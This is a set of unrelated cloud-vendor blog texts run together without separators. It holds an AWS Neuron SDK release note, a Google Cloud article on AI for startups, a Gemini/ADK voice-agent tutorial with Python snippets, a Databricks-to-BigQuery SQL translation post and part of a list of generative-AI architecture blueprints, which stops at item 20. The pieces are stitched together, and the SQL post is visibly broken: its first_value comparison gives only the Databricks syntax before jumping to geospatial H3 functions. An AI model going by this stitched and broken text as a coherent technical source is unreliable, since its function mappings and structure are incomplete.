Today, AWS announces the general availability of Neuron SDK 2.25.0, delivering improvements for inference workloads and performance monitoring on AWS Inferentia and Trainium instances. This latest release adds context and data parallelism support as well as chunked attention for long sequence processing in inference, and updates the neuron-ls and neuron-monitor APIs with more information on node affinities and device utilization, respectively.
This release also introduces automatic aliasing (Beta) for fast tensor operations, and adds improvements for disaggregated serving (Beta). Finally, it provides upgraded AMIs and Deep Learning Containers for inference and training workloads on Neuron.
Neuron 2.25.0 is available in all AWS Regions where Inferentia and Trainium instances are offered.
To learn more and for a full list of new features and enhancements, see the AWS Neuron documentation and release notes.
Startups are at the forefront of generative AI development, pushing current capabilities and unlocking new potential. Building on our Future of AI: Perspectives for Startups 2025 report, several of the AI industry leaders featured in the report joined Jason Calacanis on the “This Week in Startups” podcast’s Startup Basics series, offering their perspective on what’s next for AI.
Memory, multi-agent systems, better UX
Harrison Chase, CEO and co-founder of LangChain, spoke to the impact memory will have on agent continuity, particularly when it comes to contextual knowledge. As memory becomes more common, agents will gain experience (rather than just instructions) on how companies and team members work through feedback, preferences, and more natural subsequent adaptations, enabling deeply personalized interactions. As Jia Li, president of LiveX AI, noted, "What the users truly appreciate is when AI agents understand their needs and are thinking from their point of view."
Another exciting prospect is multi-agent collaboration, Chase said, since most AI systems still work in isolation. As agents increasingly collaborate with each other, task management, information sharing, and even delegation of duties in accordance with agent specializations will allow agents to become more efficient and reduce cognitive load for their users. This vision goes beyond simple queries, Yoav Shoham, co-founder of AI21 Labs, explained: “Typically when we speak about agents, what we have in mind is a system that’s not a transactional call to an LLM. The agent can be proactive, it executes complicated flows using multiple tools.”
That’s why Google launched a new, open protocol called Agent2Agent (A2A) — to help AI agents communicate with each other, securely exchange information, and coordinate actions on top of various enterprise platforms or applications. The A2A effort signifies a shared vision of a future when AI agents, regardless of their underlying technologies, can collaborate to automate complex enterprise workflows, to drive new levels of efficiency and innovation. We believe the A2A framework will add significant value for customers, allowing AI agents to work across their entire application estates.
Building trust in a world of autonomous AI
On the topic of multi-agent collaboration, Saurabh Tiwary, VP and GM of Cloud AI at Google, discussed how AI agents are moving beyond simple chat interfaces. He explained that today’s AI agents are designed for indeterminate tasks, and are capable of taking actions, observing outputs, and dynamically determining subsequent steps. This advanced functionality paves the way for agents to manage complex workflows such as autonomously handling emails, identifying critical tasks, and even delegating responsibilities across teams. But for this future to become reality, Saurabh underscored the need for agents to deliver high-quality output, to foster user trust and encourage the delegation of important tasks. Echoing this, LiveX AI’s Jia Li said, "We believe humanlike AI agents can create that empathy and trust between consumers and the AI agent."
At Google, we’re addressing the need for agents to work across diverse environments by offering Agent Development Kit (ADK) and the A2A protocol as open-source.
We recently donated A2A to the Linux Foundation, establishing an open governance body for the protocol. This critical step will help A2A evolve as a universal standard, fostering interoperability between agents built on any platform or using any underlying technology — not just Google’s ADK. With support from over 120 partners, including major hyperscalers like Microsoft and Amazon, this standardization allows for a future where diverse, specialized AI agents can communicate, securely exchange information, and coordinate actions across a business’s entire application ecosystem.
AI21 Labs’ Yoav Shoham pointed out that for agents to collaborate across different organizations, the fundamental hurdles of ‘semantics’ and ‘shared incentives’ must be overcome. This means that while A2A protocols may specify the syntax of communication, they do not guarantee a shared understanding of the meaning (semantics) of the information being exchanged, and agents from different organizations could have distinct or even conflicting goals, creating misaligned incentives. This presents an opportunity for startups to innovate by designing sophisticated game theory-based protocols, robust governance frameworks, and control mechanisms that ensure agents ‘play nice together’, even when their objectives differ.
Infrastructure performance is booming
At the same time, infrastructure performance is exploding at levels Amin Vahdat, Vice President for the AI and Infrastructure team at Google Cloud, has never seen before. “It’s not uncommon for us at Google to make things twice as fast in three months, and then we do it again three months later, and three months after that, and all of a sudden you have 10X or 20X performance improvements,” said Vahdat on the podcast.
“Twelve months ago, models sometimes struggled to count the number of ‘r’s’ in the word ‘strawberry,’ but today they are writing and executing code”, Vahdat said.
These improvements to model efficiency and performance have shifted the focus away from training and building models toward serving the models and maximizing their utility. Vahdat refers to 2025 as “the year of inference.”
At Google Cloud Next this April, we introduced our new, seventh-generation Tensor Processing Unit (TPU) called Ironwood, our first TPU specifically designed for inference. Ironwood dramatically improved performance while also improving power efficiency, meaning lower costs and greater workload capacity — all necessities to fuel the age of inference.
The growth of nimble startup teams
The way AI can augment and amplify human capabilities and efficiency extends well beyond the engineering team, touching every employee in a modern business.
AI can improve “every job, every function, every workflow,” offering “incredible leverage,” said David Friedberg, CEO of Ohalo Genetics. For example, you can use AI to scan and score hundreds of job resumes in just a couple of hours, a task that previously took days, or to generate comprehensive project plans in hours instead of weeks or months.
This efficiency means smaller, more nimble teams can achieve results that historically required much larger organizations. “We’ve really just shrunk the amount of time it takes to get from idea to testing and seeing if there’s value,” said Jill Chase, Partner at CapitalG. “That is the most powerful thing for startups.” This has grown startups’ addressable economic opportunities, allowing organizations with 100-200 people to pursue “deep tech” or technically difficult objectives that used to be the realm of thousand-plus-person companies. Companies leveraging AI gain significantly more “shots on goal.”
During Google I/O 2025 we highlighted major advancements in this area, emphasizing development with Gemini 2.5:
Google AI Studio, powered by Gemini, offers the fastest way for developers to evaluate models and begin building with the Gemini API. It integrates Gemini 2.5 Pro directly into the native code editor, streamlining the prototyping process. Using the Gen AI SDK, developers can instantly generate web applications from simple text, image, or video prompts.
Accessible via the Gemini API and new tools like URL Context, Gemini 2.5’s advanced reasoning capabilities allow the model to pull information from web pages, helping developers create agentic experiences. Furthermore, Gemini 2.5 Flash Native Audio, available in the Live API, can create agentic applications for speaking and listening in 24 languages with customizable voice and style. That means more natural back-and-forth conversations, with better flow and fewer extraneous sounds.
Colab’s agent-first experience, powered by Gemini 2.5 Flash, can help developers with complex tasks like fine-tuning models and building UIs, significantly reducing coding time. These tools make building faster, easier, and more efficient, so developers can focus on bringing their ideas to life.
Empowering startups to innovate more with less
At Google Cloud, we’re deeply committed to fostering innovation, providing not only cutting-edge tools and infrastructure, but also essential resources and expertise to help startups leverage AI effectively. No matter where you are with AI adoption, we’re here to help: Book your generative AI consultation today, get up to $350,000 USD in cloud credits with the Google for Startups Cloud Program, or contact our Startup team.
For more comprehensive insights into the future of AI and how Google Cloud can accelerate your startup’s growth, download the Future of AI: Perspectives for Startups 2025 report today.
Building advanced conversational AI has moved well beyond text.
Now, we can use AI to create real-time, voice-driven agents. However, these systems need low-latency, two-way communication, real-time information retrieval, and the ability to handle complex tasks. This guide shows you how to build one using Gemini and the Google Agent Development Kit (ADK). You’ll learn how to create an intelligent, responsive voice agent.
The foundational agent
First, we create an agent with a persona but no access to external tools. This is the simplest agent, relying only on its pre-trained knowledge. It’s a great starting point.
# In app/server/streaming_service.py
from google.adk.agents import Agent
from core_utils import MODEL, SYSTEM_INSTRUCTION

self.agent = Agent(
    name="voice_assistant_agent",
    model=MODEL,
    instruction=SYSTEM_INSTRUCTION,
    # The 'tools' list is omitted for now.
)
This agent can chat, but it lacks access to external information.
The advanced agent
To make the agent useful, we add tools. This lets the agent access live data and services. In streaming_service.py, we give the agent access to Google Search and Google Maps.
Google Search: This pre-built ADK tool lets your agent perform Google searches to answer questions about current events and real-time information.
MCP Toolset for Google Maps: This uses the Model Context Protocol (MCP) to connect your agent to a specialized server (in this case, one that understands the Google Maps API). The main agent acts as an orchestrator, delegating tasks it can’t handle to specialist tools.
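As a rough sketch (not the article's exact code), the tool wiring in streaming_service.py could look like the following, assuming the ADK's built-in google_search tool and an MCPToolset launched against a Google Maps MCP server; the server command, package name, and environment variable are assumptions:

# In app/server/streaming_service.py (illustrative sketch of the tool wiring)
from google.adk.agents import Agent
from google.adk.tools import google_search
from google.adk.tools.mcp_tool.mcp_toolset import MCPToolset, StdioServerParameters
from core_utils import MODEL, SYSTEM_INSTRUCTION

# MCP toolset that launches a Google Maps MCP server over stdio.
# The npx package name and the GOOGLE_MAPS_API_KEY variable are assumptions.
maps_toolset = MCPToolset(
    connection_params=StdioServerParameters(
        command="npx",
        args=["-y", "@modelcontextprotocol/server-google-maps"],
        env={"GOOGLE_MAPS_API_KEY": "YOUR_KEY"},
    )
)

self.agent = Agent(
    name="voice_assistant_agent",
    model=MODEL,
    instruction=SYSTEM_INSTRUCTION,
    # Google Search for live information, plus the Maps toolset for places and routes.
    tools=[google_search, maps_toolset],
)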
Engineering a natural conversation
The RunConfig object defines how the agent communicates. It controls aspects like voice selection and streaming mode.
StreamingMode.BIDI (bi-directional) enables users to interrupt the agent, creating a more natural conversation.
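For illustration, a RunConfig enabling bidirectional audio might look like this sketch; the exact fields and the "Aoede" voice name are assumptions that depend on the ADK and Live API versions in use:

# Illustrative RunConfig for a bidirectional (BIDI) voice session.
from google.adk.agents.run_config import RunConfig, StreamingMode
from google.genai import types

run_config = RunConfig(
    # BIDI streaming lets the user interrupt the agent mid-response.
    streaming_mode=StreamingMode.BIDI,
    # Ask the model to respond with audio rather than text only.
    response_modalities=["AUDIO"],
    # Voice selection; "Aoede" is one of the prebuilt voices (assumed here).
    speech_config=types.SpeechConfig(
        voice_config=types.VoiceConfig(
            prebuilt_voice_config=types.PrebuiltVoiceConfig(voice_name="Aoede")
        )
    ),
)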
The asynchronous core
Real-time voice chats require handling multiple tasks concurrently: listening, thinking, and speaking. Python’s asyncio and TaskGroup manage these concurrent tasks.
# In app/server/streaming_service.py (inside the handle_stream method)
import asyncio

async with asyncio.TaskGroup() as tg:
    # Task 1: Listens for audio from the user's browser.
    tg.create_task(receive_client_messages(), name="ClientMessageReceiver")
    # Task 2: Forwards audio to the Gemini service.
    tg.create_task(send_audio_to_service(), name="AudioSender")
    # Task 3: Listens for responses from Gemini.
    tg.create_task(receive_service_responses(), name="ServiceResponseReceiver")
Translating the agent’s voice
The receive_service_responses task processes the agent’s output before sending it to the user. This output includes audio and text transcription.
Handling audio
Audio is handled using Base64 encoding to convert binary data into a text string for transmission.
# --- Inside receive_service_responses ---
import base64
import json

# Handling the audio response
if hasattr(part, "inline_data") and part.inline_data:
    # Encode the raw audio bytes into a Base64 text string.
    b64_audio = base64.b64encode(part.inline_data.data).decode("utf-8")
    # Package it in a JSON message, typed as "audio".
    await websocket.send(json.dumps({"type": "audio", "data": b64_audio}))
Handling text
Text transcription is streamed for real-time feedback.
# --- Inside receive_service_responses ---
# Handling the text response
if hasattr(part, "text") and part.text:
    # Check if the text is a streaming, partial thought.
    event_str = str(event)
    if "partial=True" in event_str:
        # Send it for real-time display on the client.
        await websocket.send(json.dumps({"type": "text", "data": part.text}))
As data platforms evolve and businesses diversify their cloud ecosystems, the need to migrate SQL workloads between engines is becoming increasingly common. Recently, I had the opportunity to work on translating a set of Databricks SQL queries to BigQuery SQL — a task that is deceptively complex due to differences in syntax, functions, and execution behavior.
To streamline the process, we turned to Google Gemini, a powerful AI assistant, to help bridge the gap between the two SQL dialects. In this blog post, I’ll walk you through the process, challenges we faced, how Gemini helped, and key takeaways from the experience.
The translation tightrope: Why it’s tricky
To boost operational efficiency and cut costs, we migrated analytics workloads from Databricks SQL (on Delta Lake tables) to Google BigQuery. This required rewriting numerous queries, from simple aggregations to intricate CTEs and window functions.
Databricks, with its powerful Spark SQL capabilities, and BigQuery, a serverless and highly scalable data warehouse, are both titans in the data world. However, their SQL dialects, while sharing common ANSI SQL foundations, have distinct variations. Translating between the two manually was possible, but would have been time-consuming and error-prone. This is where Google Gemini played a crucial role.
Below are some of the data type mappings between Databricks and BigQuery:
Category | Databricks SQL Data Type | BigQuery SQL Data Type | Description
Integer Types | TINYINT | INT64 | 8-bit integer
Integer Types | SMALLINT | INT64 | 16-bit integer
Integer Types | INT or INTEGER | INT64 | 32-bit integer
Integer Types | BIGINT | INT64 | 64-bit integer
Floating-Point Types | FLOAT or REAL | FLOAT64 | 64-bit floating point
Floating-Point Types | DOUBLE | FLOAT64 | 64-bit floating point (equivalent to BigQuery's FLOAT64)
Decimal/Exact Types | DECIMAL or NUMERIC | NUMERIC or BIGNUMERIC | Fixed-point decimal with user-defined precision and scale; BigQuery's BIGNUMERIC offers extended precision
Boolean Types | BOOLEAN | BOOL | True or False
String Types | STRING or VARCHAR | STRING | Variable-length string
String Types | CHAR | Not supported | Fixed-length strings are not directly supported in BigQuery; use STRING instead
Date and Time Types | DATE | DATE | Calendar date (year, month, day)
Date and Time Types | TIMESTAMP | TIMESTAMP | Timestamp with time zone information
Date and Time Types | DATETIME | DATETIME | Timestamp without time zone
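For automated rewrites, the table above can be captured as a simple lookup; here is an illustrative Python version:

# Databricks-to-BigQuery data type mapping, taken from the table above.
DATABRICKS_TO_BIGQUERY_TYPES = {
    "TINYINT": "INT64",
    "SMALLINT": "INT64",
    "INT": "INT64",
    "INTEGER": "INT64",
    "BIGINT": "INT64",
    "FLOAT": "FLOAT64",
    "REAL": "FLOAT64",
    "DOUBLE": "FLOAT64",
    "DECIMAL": "NUMERIC",   # use BIGNUMERIC when more precision is needed
    "NUMERIC": "NUMERIC",
    "BOOLEAN": "BOOL",
    "STRING": "STRING",
    "VARCHAR": "STRING",
    "CHAR": "STRING",       # fixed-length CHAR is not supported; fall back to STRING
    "DATE": "DATE",
    "TIMESTAMP": "TIMESTAMP",
    "DATETIME": "DATETIME",
}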
Syntax differences between Databricks and BigQuery
First_Value:
Databricks
first_value(expr[, ignoreNull]) [FILTER ( WHERE cond )]
Geospatial helpers are trickier still. Databricks ships H3 functions, for example one that returns the polygonal boundary of an input H3 cell in WKT format, that have no one-to-one BigQuery counterpart. Providing precise details for complex functions like these is crucial: we found that once these H3 translations were spelled out, even advanced models like Gemini generated more accurate and reliable BigQuery SQL from the original Databricks Spark SQL, keeping geospatial analyses intact.
Architecture overview
Before diving into the translation logic, let me show you how the pieces fit together.
Pipeline components
Source SQL Storage:
All original Databricks SQL files were stored in Google Cloud Storage.
Function mapping guide:
A curated guide that maps Databricks-specific SQL functions (e.g., first_value, ucase) to their BigQuery equivalents (FIRST_VALUE, UPPER, TIMESTAMP, etc.).
This guide included examples and syntax rules, which were used as input context for Gemini.
Few-shot examples:
I selected a set of hand-translated queries to serve as high-quality training prompts to improve Gemini’s consistency.
Retrieval-Augmented Generation (RAG) layer:
Before querying Gemini, I leveraged the Vertex AI RAG Engine to retrieve relevant function mappings and example translations, giving Gemini grounded knowledge and improving the accuracy of its output.
Gemini API integration:
The RAG-enriched prompt was sent to Gemini for translation (see the sketch after this list).
Returned SQL was optionally post-processed to fix edge cases.
Validation layer:
Translated SQL queries were validated by executing them in BigQuery dry-run mode to detect syntax issues.
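To make the Gemini integration step concrete, here is a minimal sketch of the translation call using the Vertex AI SDK. The project ID, model name, and prompt wording are illustrative assumptions, and the retrieved_context argument stands in for whatever the RAG layer returns:

# Minimal sketch of the translate step: build a RAG-enriched prompt and call Gemini on Vertex AI.
import vertexai
from vertexai.generative_models import GenerativeModel

vertexai.init(project="my-project", location="us-central1")  # placeholder project/region
model = GenerativeModel("gemini-1.5-pro")  # any available Gemini model

def translate_query(databricks_sql: str, retrieved_context: str) -> str:
    """Return Gemini's BigQuery translation of a Databricks SQL query."""
    prompt = (
        "You translate Databricks Spark SQL to BigQuery SQL.\n"
        "Use only the function mappings and examples provided below.\n\n"
        f"--- Function mappings and few-shot examples ---\n{retrieved_context}\n\n"
        f"--- Query to translate ---\n{databricks_sql}\n\n"
        "Return only the translated BigQuery SQL."
    )
    response = model.generate_content(prompt)
    return response.text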
Architecture diagram
Lessons learned
RAG + Gemini = Smart SQL translation: Grounding Gemini with real-world examples and mapping logic made it significantly more accurate.
A comprehensive function mapping guide is essential: Invest time in building a robust function mapping resource.
Thorough validation is key: Use BigQuery’s dry run and information schema to ensure translated queries are safe and optimized.
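As a sketch of that validation step, a BigQuery dry run flags syntax errors and reports bytes scanned without actually running the translated query (the function name below is illustrative):

# Validate a translated query with a BigQuery dry run.
from google.cloud import bigquery

client = bigquery.Client()

def validate_translation(bq_sql: str) -> bool:
    job_config = bigquery.QueryJobConfig(dry_run=True, use_query_cache=False)
    try:
        job = client.query(bq_sql, job_config=job_config)
        print(f"OK: query would process {job.total_bytes_processed} bytes")
        return True
    except Exception as exc:  # e.g. a BadRequest carrying the syntax error details
        print(f"Validation failed: {exc}")
        return False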
Ready to streamline your SQL migrations?
Stop wrestling with SQL syntax and start leveraging the power of your data, wherever it resides. With the Gemini model, we can streamline your Databricks Spark SQL to BigQuery SQL translation process, making it faster, more reliable, and far less painful.
Dive in and accelerate your journey to cross-platform data success. Click on this link to get more details, and take it forward!
A little over a year ago, we published a list of generative AI use cases that has since grown to include more than 600 examples of how organizations are putting AI to work. Yet for many developers and business leaders, inspiration has given way to a more practical question: where do I start?
To help, we’ve created a technical complement to our most impactful, customer-inspired use cases. This guide contains 101 architectural blueprints as illustrative starting points to give you a practical foundation for your next project.
Each blueprint shows a design pattern and a corresponding Google Cloud tech stack to solve real-world challenges, from automating document summarization and forecasting sales, to improving patient outcomes and preventing fraud.
Let’s dive in.
The list is organized by 10 major industry groups.
These architectural blueprints are inspired by customers who are using AI in the retail industry, such as Mercari, Target, Carrefour Taiwan, The Home Depot, Unilever, and more.
1. Unify online and in-store retail experiences
Business challenge: You’re a large retailer with valuable physical stores and a growing e-commerce channel. These two worlds operate in silos, creating a disconnected experience where customers face inconsistent pricing, promotions, and inventory levels.
Blueprint: Customer traffic hits your e-commerce site -> Cloud CDN caches static content for speed -> GKE scales containerized e-commerce microservices based on demand -> Apigee manages APIs for real-time inventory checks against store-level data -> All sales data streams into BigQuery for supply chain analytics and demand forecasting
2. Give your store managers ways to see real-time inventory
Business challenge: You want to boost efficiency by giving your store managers accurate, real-time inventory recommendations.
Tech stack: BigQuery, Vertex AI, Looker, Google Workspace.
Blueprint: Daily sales and inventory data from thousands of stores is ingested into BigQuery -> Vertex AI models process historical data to predict demand for each item -> Looker generates dashboards with recommended stock levels -> Recommendations are pushed to store associates’ devices, often via a simple interface like Google Sheets.
3. Make it easy for users to find and discover unique items on your online site
Business challenge: You have millions of unique, non-standard items and need to provide a highly relevant, fast, and personalized search experience for your users.
Tech stack: Google Cloud Storage, Dataflow, BigQuery, GKE.
Blueprint: A seller lists a new item, and its data is stored in Cloud Storage -> Dataflow processes item details and user interaction data in real-time -> This data enriches search indexes and feeds machine learning models running on GKE -> When a user searches, the models provide personalized rankings, which are served in milliseconds.
4. Modernize in-store operations with AI
Business challenge: You’re a retailer who needs to digitize and streamline legacy, paper-based processes for store associates to improve productivity and customer service.
Tech stack: Vertex AI Vision, GKE, Android, ChromeOS.
Blueprint: An associate uses a mobile device to scan a product shelf -> Vertex AI Vision analyzes the image to identify products and price tags -> An application, running on GKE, cross-references this with inventory data -> The device displays inventory status, ordering needs, or planogram compliance information.
5. Create an assistant for a better shopping experience
Business challenge: You’re a brand whose traditional support channels, like text-based chatbots and FAQs, feel impersonal, can’t visually guide customers through complex processes, and might not create a genuine connection with your audience.
Tech stack: Vertex AI, Google Cloud Storage (for 3D assets), GKE (for hosting and scaling), Speech-to-Text & Text-to-Speech APIs
Blueprint: A customer asks a troubleshooting question in your app (e.g., “How do I replace the water filter in my coffee machine?”). ➝ The request (voice or text) is sent to the conversational AI “brain” on Vertex AI, which identifies the intent. ➝ The AI generates a text response and identifies the corresponding visual aid (e.g., filter_replacement_step1.mp4). ➝ A service on GKE retrieves this video clip from Google Cloud Storage. ➝ The app displays the text and plays the short video, visually guiding the customer through the process and resolving their issue quickly.
6. Write differentiated product descriptions
Business challenge: You’re a large e-commerce retailer that needs to create unique, high-quality, and SEO-friendly product descriptions for thousands of items at scale, reducing manual effort and avoiding duplicate content.
Tech stack: Vertex AI, Cloud Run, BigQuery.
Blueprint: A merchandiser inputs key product attributes (e.g., material, color, target audience) into a product management tool -> These attributes are sent to a service on Cloud Run -> The service constructs a detailed prompt and calls the Vertex AI Generative AI API -> Vertex AI analyzes the attributes and returns multiple unique description options -> The descriptions are displayed to the merchandiser for review, editing, and final approval.
7. Help users find your products using photos as a reference
Business challenge: You want to make it easy for your customers to find desired inventory (e.g. clothing) using a photo as a reference.
Tech stack: Vertex AI Vision, Vector Search, Google Cloud Storage, Cloud Run.
Blueprint: A customer uploads a reference photo in the app -> The app sends the photo to a service on Cloud Run -> The service uses Vertex AI Vision to convert the photo into a vector embedding -> This embedding is used to query Vector Search, which finds the most visually similar product embeddings from the indexed catalog -> The service returns the matching products to the customer in seconds.
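For the embedding step of this blueprint, a minimal sketch using the Vertex AI multimodal embedding model and a deployed Vector Search index might look like this; the project, endpoint, and index IDs are placeholders:

# Illustrative sketch of the photo-to-embedding lookup; resource names are placeholders.
from google.cloud import aiplatform
from vertexai.vision_models import Image, MultiModalEmbeddingModel

aiplatform.init(project="my-project", location="us-central1")

# 1. Convert the uploaded photo into a vector embedding.
model = MultiModalEmbeddingModel.from_pretrained("multimodalembedding@001")
embedding = model.get_embeddings(image=Image.load_from_file("reference_photo.jpg"))

# 2. Query a deployed Vector Search index for visually similar products.
index_endpoint = aiplatform.MatchingEngineIndexEndpoint(
    "projects/my-project/locations/us-central1/indexEndpoints/1234567890"
)
neighbors = index_endpoint.find_neighbors(
    deployed_index_id="catalog_index",
    queries=[embedding.image_embedding],
    num_neighbors=10,
)
print(neighbors)  # IDs and distances of the closest catalog items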
8. Build a real-time product recommendation engine
Business challenge: You’re a digital retailer trying to increase basket size and customer loyalty. Traditional recommendation engines are too simplistic, often failing to understand a customer’s true intent or style beyond basic keywords. This leads to generic suggestions, poor discoverability for unique items in your catalog, and frustrated shoppers who abandon their carts, causing you to leave significant revenue on the table.
Blueprint: User clickstream data streams into Dataflow -> Dataflow processes and enriches these events, updating user profiles and embeddings in real-time (in BigQuery or a feature store) -> As a user browses, a request is sent to a service on Cloud Run -> The service queries Vector Search with the user’s embedding to find the most relevant or complementary items -> A personalized list of products is returned and displayed to the user in milliseconds.
9. Quickly identify trends and improve customer interactions
Business challenge: Valuable customer feedback is buried in thousands of rows of unstructured text from surveys, reviews, and support tickets. Manually reading, tagging, and categorizing this data is a slow and tedious process that delays critical insights and prevents your team from quickly reacting to emerging trends or urgent issues.
Tech stack: Google Sheets, Gemini for Google Workspace, Google Forms (as a data source).
Blueprint: Customer feedback is collected from sources like Google Forms and consolidated into a Google Sheet -> An analyst highlights the column of raw feedback and uses the integrated Gemini feature with a prompt like “Categorize this feedback” -> Gemini processes the text in each cell and populates a new column with the corresponding categories -> The analyst can then create charts and pivot tables on this newly structured data to identify trends.
10. Compare vendor proposals, right from your email
Business challenge: You’re a buyer or department head responsible for making purchasing decisions. But complex vendor proposals arrive in different formats, burying key details like costs, timelines, and deliverables across dozens of pages. Manually creating a comparison is slow, tedious, and prone to human error, creating the risk that you’ll miss a critical detail and make a costly decision.
Tech stack: Gmail, Gemini for Google Workspace.
Blueprint: A buyer receives multiple emails with vendor proposals as attachments (PDFs, Docs, etc.) -> In the Gmail thread, the user activates Gemini and provides a prompt like, “Create a table comparing the cost, timeline, and key deliverables from the attached proposals” -> Gemini reads the context of the emails and the content of the attachments -> It generates a concise summary and a comparison table directly in the Gmail interface -> The buyer can then make a faster, more informed decision without manually cross-referencing documents.
11. Merge and deduplicate product listings
Business challenge: You’re an e-commerce catalog manager responsible for a massive product catalog sourced from multiple vendors. Inconsistent data creates countless duplicate listings for the same item. This clutters the customer experience, splits your inventory and sales data (making accurate forecasting impossible) and harms your search rankings, all while your team spends countless hours manually trying to find and merge them.
Tech stack: BigQuery, Vertex AI, Dataflow
Blueprint: Product catalog data is processed by a data processing pipeline (Dataflow) -> Dataflow calls a Vertex AI model to convert product text and images into vector embeddings -> The embeddings are stored in BigQuery -> A BigQuery ML clustering model groups items with similar embeddings into duplicate sets -> These duplicate sets are sent to a review dashboard or an automated merging service.
These architectural blueprints are inspired by customers who are using AI in the media, marketing, and gaming industry, such as: Formula E, The Golden State Warriors, Spotify, Warner Bros Discovery, and more.
12. Summarize commentary into podcasts
Business challenge: You’re a broadcaster or sports league with hours of live commentary for each event. Manually creating highlight reels, summaries, or daily podcasts is time-consuming, labor-intensive, and slow, causing you to miss opportunities for timely fan engagement.
Tech stack: Google Cloud Speech-to-Text, Vertex AI, Cloud Functions, and Google Cloud Storage.
Blueprint: Live audio commentary is captured and stored in Google Cloud Storage ➝ A Cloud Function is triggered, which sends the audio file to the Speech-to-Text API to generate a full, time-stamped transcript ➝ The transcript is sent to a Vertex AI generative model with a prompt like, “Identify the top 5 most exciting moments from this race transcript based on exclamation, keywords (e.g., ‘overtake’, ‘crash’), and sentiment. For each moment, create a 30-second summary script” ➝ The generated podcast script is then sent to a text-to-speech engine or a human host to be recorded, creating a “daily highlights” podcast in minutes instead of hours.
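For the transcription step in this blueprint, a minimal sketch of the Speech-to-Text call might look like the following; bucket and file names are placeholders:

# Illustrative transcription step for commentary stored in Cloud Storage.
from google.cloud import speech

client = speech.SpeechClient()

audio = speech.RecognitionAudio(uri="gs://commentary-bucket/race_commentary.flac")
config = speech.RecognitionConfig(
    language_code="en-US",
    enable_word_time_offsets=True,       # time-stamped words help locate highlights
    enable_automatic_punctuation=True,
)

# Long-running recognition suits multi-minute commentary files in GCS.
operation = client.long_running_recognize(config=config, audio=audio)
response = operation.result(timeout=900)

transcript = " ".join(result.alternatives[0].transcript for result in response.results)
print(transcript[:500])  # this text is then sent to Gemini to pick highlights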
13. Build a content recommendation engine
Business challenge: You’re a sports franchise or media company that has consolidated all of its fan data into a unified data foundation. You want to deliver relevant, personalized content to every fan—including real-time game highlights, scores, and alerts about ticket sales or events—to deepen engagement and increase revenue.
Tech stack: BigQuery, Vertex AI Search, Vector Search, Dataflow, and Cloud Run.
Blueprint: Real-time fan interactions and game data (scores, stats) stream into Pub/Sub ➝ A Dataflow pipeline processes and enriches this data, updating fan profiles in the BigQuery unified data foundation ➝ Vertex AI uses this historical and real-time data to train a recommendation model ➝ When a fan uses the team’s app, a request is sent to a service on Cloud Run ➝ The service queries Vertex AI Search with the fan’s ID, which returns a personalized list of content (highlights, articles, ticket alerts) ➝ The app displays the personalized recommendations to the fan in real time.
14. Create ultra-personalized media campaigns
Business challenge: You want to move beyond generic marketing and create deeply personal, shareable moments for every single user.
Tech stack: BigQuery, Vertex AI, Dataflow, Cloud Run, and Google Cloud Storage.
Blueprint: A large-scale Dataflow pipeline processes a year’s worth of user interaction data from BigQuery to calculate personalized stats for each user ➝ For each user, a service on Cloud Run sends their top stats (e.g., favorite artist, most-played song) to the Gemini API with a prompt like, “Generate a fun, upbeat script for a podcast summarizing these listening habits” ➝ The Cloud Run service uses the generated text to create personalized assets (audio clips, social media images) and stores them in Google Cloud Storage ➝ When the user opens their app, it fetches their unique, pre-generated assets from Cloud Storage to deliver their personalized experience.
15. Build an AI captioning tool
Business challenge: You’re a major media company with a massive archive of video content. Your challenge is making this content accessible and searchable by creating accurate, time-stamped captions and transcripts, a process that is incredibly slow and expensive to do manually.
Blueprint: A video file is uploaded to Google Cloud Storage. ➝ A Cloud Function triggers and sends the video’s audio track to the Speech-to-Text API, specifying a model trained for media content. ➝ The API returns a detailed, time-stamped transcript. ➝ For added context, the transcript can be sent to a Gemini model with a prompt like, “Identify the different speakers in this transcript and label their lines,” providing a rich, searchable, and accessible caption file.
16. Write social media captions
Business challenge: You’re a sports league or broadcaster with hours of event footage. Your challenge is quickly creating engaging social media clips to capitalize on exciting moments, a process that requires a social media manager to manually watch footage, select a clip, and write a caption.
Tech stack: Gemini for Google Drive, Google Drive.
Blueprint: All broadcast footage from an event is saved to a shared folder in Google Drive. ➝ A social media manager opens the Gemini in Drive side panel. ➝ They use a prompt like, “Analyze the video files in this folder from the last hour. Find the top 3 most exciting moments based on commentary and crowd noise. For each, suggest a 5-second video clip and write three different engaging social media captions with relevant hashtags.” ➝ Gemini provides the clips and captions directly in the Drive interface, turning an hours-long task into a single prompt.
17. Create hundreds of hyper-personalized video and audio ad variations in minutes
Business challenge: You’re a digital advertising platform, and your clients want to move beyond one-size-fits-all ads. Your challenge is creating hundreds of personalized ad variations tailored to different audiences, a task that is prohibitively expensive and slow using traditional production methods.
Blueprint: An advertiser defines a campaign with multiple target audience segments stored in BigQuery (e.g., “young professionals,” “college students”). ➝ For each segment, a service on Cloud Run calls the Gemini API with a prompt like, “Generate a 15-second audio ad script for a new coffee brand, targeting ‘young professionals’. The tone should be sophisticated and energetic.” ➝ Gemini generates a unique script for each audience. ➝ The scripts are sent to the Text-to-Speech API to create audio voiceovers in various styles. ➝ These audio files are combined with background music, creating hundreds of personalized ad variations in minutes.
18. Gen AI photo-editing and design
Business challenge: You’re a franchise business and you need to create high-quality, professional marketing materials for hundreds of local branches. Your challenge is that local owners are not graphic designers, and hiring designers for every local ad is not scalable.
Tech stack: Vertex AI, Google Cloud Storage, a custom marketing portal (built on App Engine or Cloud Run).
Blueprint: A local studio owner logs into a central marketing portal. ➝ They upload a photo of their students to Google Cloud Storage. ➝ The portal provides an editing interface powered by Imagen 3, Google’s image generation model. ➝ The owner can use simple prompts like, “Extend the background of this photo to fit a vertical social media post,” or “Create a dynamic ‘new student special’ graphic using this photo.” ➝ The AI generates professional-quality, on-brand marketing assets, empowering local franchises to create their own materials without design expertise.
19. Search data across tens of thousands of courses
Business challenge: You’re a large media or education company with tens of thousands of courses, articles, and learning materials. Your challenge is helping users find the specific information they need when it’s buried across this massive and diverse content library.
Tech stack: Vertex AI Search, BigQuery, Google Cloud Storage.
Blueprint: All course content, including text, videos, and metadata, is indexed from sources like Google Cloud Storage and BigQuery into Vertex AI Search. ➝ A user goes to the learning platform and uses a natural language search query like, “I want to learn about the basics of financial modeling in spreadsheets, but I only have 30 minutes.” ➝ Vertex AI Search understands the multiple intents (topic, format, duration) and queries across the entire catalog. ➝ It returns a ranked list of the most relevant results, such as a specific 10-minute video lecture and a 20-minute practical exercise, providing a much more relevant result than a simple keyword search.
20. Make video content generation faster
